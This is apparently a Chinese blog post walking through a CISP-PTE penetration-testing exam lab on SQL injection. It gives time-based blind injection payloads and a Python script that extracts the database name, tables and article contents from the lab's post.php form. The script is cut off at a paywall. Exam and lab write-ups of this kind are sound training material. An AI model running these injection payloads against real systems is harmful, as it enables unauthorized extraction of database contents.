CISP-PTE真题演示

最新推荐文章于 2024-06-13 17:59:16 发布
最新推荐文章于 2024-06-13 17:59:16 发布
阅读量1.9k 收藏 8
点赞数 2
分类专栏: 面试 学习路线 阿里巴巴 文章标签: android 前端 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67400973/article/details/126098941
版权

周末帮好兄弟做PTE的真题,觉得确实挺有意思的,于是就有了这篇文章,侵删侵删哈

第一阶段

基础题目一:SQL注入

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

在这里插入图片描述

开始答题
在这里插入图片描述

这道题的有趣的地方就是,你先注册用户,不同于以往的360的PTE真题,并不是以admin用户去发表文章就能看到key,按照往常的先注册一个用户吧
在这里插入图片描述

可以看见,此时提示的代码显示过滤掉“#”、“–”注释符号,我们先正常写一篇文章试试
在这里插入图片描述

可以看见,这是一条插入语句,该插入方式的特点就是,插入的字段必须与表字段个数相同,多一个少一个都不行。我们看一下字段显示是否是2/3段
在这里插入图片描述
没戳,是2/3段位显示的位数,按照往常的只要能把后面的东西注释掉,然后把select语句或者直接利用报错注入插进去就行了,问题就是–、#都给注释了,那么此时应该如何利用呢?

笨人采用笨方法—SQL时间盲注解题

在这里插入图片描述

可以看见,页面确实是延迟了2秒,本来想用布尔盲注的,因为我发现条件为真的时候,文章显示为1为假的时候显示为2,一般能用布尔盲注尽量不用时间盲注,因为时间盲注一旦哪次访问出现异常,例如页面响应慢了,网络延迟了,都会影响测试的结果。但是由于文章不会直接显示在当前页面,所以只能用时间盲注,
用的poc:

笔者一开始进入误区,想复杂了,写了一个盲注脚本,利用时间盲注进行注入查询

' or if ((ascii (mid(database(), 1,1))=32),sleep(2),1) or '

' or (if(ascii(mid((select table_name from information_schema.tables where table_schema like 0x32776562 limit 0,1),1,1))=1,1,sleep(2))) or '

' or (if(ascii(mid((select column_name from information_schema.columns where table_schema like 0x32776562 and table_name like 0x61727469636C6531 limit 0,1),1,1))=1,sleep(2),1)) or '

' or (if(ascii(mid((select group_concat(content) from (select * from article1 limit 0,5) as temp),1,1))=1,sleep(2),1)) or '

时间盲注的话,老夫写出了一些还算能用的脚本,脚本如下

import requests
import time
?
def database_len():
    length = 0
    database = ''
    for l in range(1, 8):
        startTime1 = time.time()
        url = "http://ip:81/start/post.php"
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": "PHPSESSID=ou3nrutcen0sh484fjfte8fvp3;",
            "X-Forwarded-For": "127.0.0.1"
        }
        data = ("title=' or if (((length(database()))=%d),sleep(2),1) or '&content=" %(l))
        #print(data)
        response = requests.post(url, data=data, headers=header, verify=False, timeout=10)
        #print(response.text)
        if time.time() - startTime1 > 1:
            length += l
    print("the length :", str(length))
#database_len()       
?
def database_name():
    s = []
    for i in range(1, 5):
        for j in range(32,127):
            startTime1 = time.time()
            url = "http://ip?:81/start/post.php"
            header = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": "PHPSESSID=ou3nrutcen0sh484fjfte8fvp3;",
                "X-Forwarded-For": "127.0.0.1"
            }
            data = ("title=' or if ((ascii (mid(database(),%d,1))=%d),sleep(2),1) or '&content=" % (i,j))
            #print(data)
            response = requests.post(url, data=data, headers=header, verify=False, timeout=10)
            if time.time() - startTime1 >= 1:
                #print(j)
                str = chr(int(j))
                s.append(str)
                break
    print('database_name:', ''.join(s))
#database_name()
?
def table_name():
    s = []
    for i in range(0, 5):
        for k in range (1, 10):
            for j in range(32, 127):
                startTime1 = time.time()
                url = "http://ip?:81/start/post.php"
                header = {
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
                    "Content-Type": "application/x-www-form-urlencoded",
                    "Cookie": "PHPSESSID=ou3nrutcen0sh484fjfte8fvp3;",
                    "X-Forwarded-For": "127.0.0.1"
                }
                data = (
                            "title=' or (if(ascii(mid((select table_name from information_schema.tables where table_schema like 0x32776562 limit %d,1),%d,1))=%d,sleep(2),1)) or '&content=" % (
                    i,k,j))
                print(data)
                response = requests.post(url, data=data, headers=header, verify=False, timeout=10)
                if time.time() - startTime1 >= 1:
                    # print(j)
                    str = chr(int(j))
                    s.append(str)
                    break
        print('table_name:', ''.join(s))
    print('tables_name:', ''.join(s))
#table_name()
?
def table_name_1():
    s = []
    for i in range(0, 9):
        for j in range(32, 127):
            startTime1 = time.time()
            url = "http:/
最低0.47元/天 解锁文章
毛毛的猫毛
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISP-PTE考前实操练习
2301_79546223的博客
09-13 856
CISP-PTE考前学习练习目,渗透测试功工程师
有了这个网络安全面试,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 476
还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CISP-PTE 文件包含
XiaoYeZhu_1314的博客
04-25 504
2、查看页面源代码,发现data://替换成了空,其余的都在,data://被注释了。5、进入文件管理,找到html目录,找到key,拿到值。1、尝试使用data协议,发现php被过滤掉了。3、双写datdata://a://4、将地址放入蚁剑或菜刀中连接。
CISP-PTE练习篇(基础目三:文件包含)
wojiaoqwe的博客
01-30 3051
本文仅当作练习记录使用。
文件上传突破学习笔记(待更新)
热门推荐
Y4tacker的博客
06-19 1万+
文章目录漏洞总结 漏洞总结 MIME的格式: type/subtype,有时候可以通过修改Content-type来绕过
CISP-PTE学习总结之基础练习(二)
千寻的博客
10-20 7488
基础目一:SQL注入 0x01 目要求 0x02 解过程 基础目二:文件上传突破 0x01 目要求 0x02 解过程 基础目三:文件包含 0x01 目要求 0x02 解过程 0x03 解总结 基础目四:代码执行漏洞 0x01 目要求 0x02 解过程 0x03 解总结 基础目五:失效的访问控制 0x01 目要求 0x02 解过程
基础目之文件上传突破
king丶
07-31 1440
基础目之文件上传突破 此处过滤,文件类型php,文件头, php后缀有 php php3 php5 php7 pht phtml
CISP-PTE靶场(win+centos).zip
03-13
pte-win2003.rar pte-centos(新可用).rar CISP-PTE靶场搭建方法.rar
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。该领域的知识体系主要包括账户安全、文件系统安全、日志分析、账户风险与安全策略等几个方面。 账户安全是 Windows 操作系统...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
CISP-PTE培训PPT讲义.zip
09-09
CISP-PTE渗透测试工程师认证培训讲义PPT: 操作系统安全 windows操作系统安全 数据库安全 Web安全基础 HTTP协议 注入漏洞 XSS漏洞 请求伪造漏洞 文件处理漏洞 访问控制漏洞 会话管理漏洞 实战练习 中间件安全-...
cisp-pte考试环境下载-原
04-01
本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观与实操两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在实的...
网络安全学习笔记——文件包含漏洞(PTE-WEB)
just do it
06-10 272
php允许文件间的互相引用,可以在php文件里面使用include,一般来说,引用的东西应该在同一个目录里面,所以可以使用相对路径来引用——include "2.php"开发人员为了提升效率,采用文件包含的函数,由于php语言提供的文件包含功能过于强大,所以大部分的文件包含漏洞都出现在php程序之中本地文件包含是指被包含的文件在本地,可以直接通过文件名或文件夹名+文件名来引用包含,远程文件则需使用如 include"https://baidu.com/nosery"
CISP-PTE实操练习讲解二(新版)
lza20001103的博客
08-06 6913
CISP-PTE实操练习讲解二(新版)
【PTE练习】文件上传upload-labs
leo788的博客
12-12 546
12用的是GET方法,13是POST方法,换汤不换药,但是在post中的截断不是在url中显示,因此其不需要url编码。其中,这里先执行首尾删除空格-删除末尾点-以点作为分隔-转换为小写-去除文件流-首尾删除空格,利用此在后缀处添加(点空格点)进行绕过,经过过滤后的后缀名带点,绕过黑名单php后缀。查看源码,其对文件类型进行判别,所以是MIME类型,将2.php上传后修改其类型为image/jpeg,转发包,成功。缺少空格,但是后缀中的空格会被系统删掉,所以通过抓包修改后缀名+空格。
PTE笔记:文件上传与文件包含
最新发布
小月肖的博客
06-13 761
PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。2)黑名单过滤,不允许上传php、xx等,这时候,上传一个图片码,用bp抓包,在repeater中修改后缀为php3、php4、php5、phtml等;1)白名单过滤,只允许上传xx,这时候就做一个图片码,将图片码上传上去,用bp抓包,在repeater中修改后缀,然后发送,再去浏览器查看。针对../过滤-->双写..././-->..\。
WAF绕过-漏洞利用篇-sql注入+文件上传-过狗
xiaoheizi的博客
08-05 421
硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。
pte 文件包含
weixin_51387754的博客
10-13 1059
注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。
cisp-pte下载
06-27
CISP-PTC是一个计算机网络安全考试认证,需要经过考试后才能获得证书。该考试主要涉及信息安全技术、网络入侵测试、渗透测试等方面的知识,是一项比较专业和难度较高的考试。对于想要从事网络安全相关工作的人来说,获得该证书可以有效提高其职业水平和竞争力。目前,该考试是由国际信息系统安全认证联盟(ISC)主办,并在全球范围内得到广泛的认可和应用。如果想要参加CISP-PTC考试,可以在官网上购买考试资料和下载。考生可以通过学习备考资料和做来更好地掌握考试所需的知识和技能,从而提高自己的考试成绩。同时,为了保障考试的公平公正,考试机构会定期更新考试内容和,以确保考试的实效性和权威性。因此,考生要及时关注考试机构的公告和更新信息,选择适合自己的考试材料和服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值